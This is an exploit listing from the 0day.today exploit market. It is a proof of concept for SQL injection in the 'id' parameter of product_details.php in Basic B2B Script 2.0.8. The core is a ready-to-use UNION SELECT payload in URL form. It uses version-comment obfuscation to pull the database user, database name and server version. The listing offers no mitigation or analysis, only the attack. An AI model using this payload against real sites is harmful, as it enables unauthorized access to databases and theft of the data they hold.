[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Basic B2B Script 2.0.8 - product_details.php?id SQL Injection Vulnerability

Author
Ihsan Sencan
Risk
[
Security Risk High
]
0day-ID
0day-ID-29158
Category
web applications
Date add
10-12-2017
Platform
php
# Exploit Title: Basic B2B Script 2.0.8 - SQL Injection 
# Dork: N/A 
# Date: 08.12.2017 
# Vendor Homepage: https://www.phpscriptsmall.com/ 
# Software Link: https://www.phpscriptsmall.com/product/professional-b2b-script/ 
# Version: 2.0.8 
# Category: Webapps 
# Tested on: WiN7_x64/KaLiLinuX_x64 
# CVE: N/A 
# # # # # 
# Exploit Author: Ihsan Sencan 
# Author Web: http://ihsan.net 
# Author Social: @ihsansencan 
# # # # # 
# Description: 
# The vulnerability allows an attacker to inject sql commands.... 
#  
# Proof of Concept:  
#  
# 1) 
# http://localhost/[PATH]/product_details.php?id=[SQL] 
#  
# -348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+-- 
#  
# http://server/product_details.php?id=-348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+-- 
#  
# # # # #

#  0day.today [2024-11-16]  #